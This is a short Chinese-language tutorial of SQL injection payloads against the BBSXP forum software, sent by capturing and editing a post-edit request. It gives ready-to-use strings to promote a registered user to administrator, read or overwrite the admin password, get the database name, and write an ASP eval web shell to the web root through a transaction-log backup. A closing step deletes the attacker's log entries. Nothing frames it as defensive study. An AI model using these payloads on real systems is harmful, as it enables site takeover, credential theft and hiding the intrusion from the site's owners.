芊芊做的教程
这里记录一下:
注册---->发帖---->编辑(抓包提交)
define:cnsapc为注册用户
bug为帖子内容
这里记录一下:
注册---->发帖---->编辑(抓包提交)
define:cnsapc为注册用户
bug为帖子内容
提升为管理员:
&cnsapc=bug','');update bbsxp_users set userroleid=1 where username='cnsapc'--
获取后台密码:
&cnsapc=bug','');update bbsxp_users set usermail=(select adminpassword from bbsxp_sitesettings) where username='cnsapc'--
修改后台密码:
&cnsapc=bug','');update bbsxp_sitesettings set adminpassword='md5密码'-- 注意:bbsxp经过md5加密的密码字母都是大写的
获得数据库名:
&cnsapc=bug','');update bbsxp_users set usermail=db_name() where username='cnsapc'--
log备份拿webshell:
&alter database bbsxp set recovery full;drop table cmd;create table cmd (a image);backup log bbsxp to disk = 'c:\cmd' with init;insert into cmd(a) values ('<%eval request(chr(35)):response.end%>');backup log bbsxp to disk = 'C:\web\bbsxp\cmd.asp';--
清除日志:
&delete * from bbsxp_log where username='cnsapc'--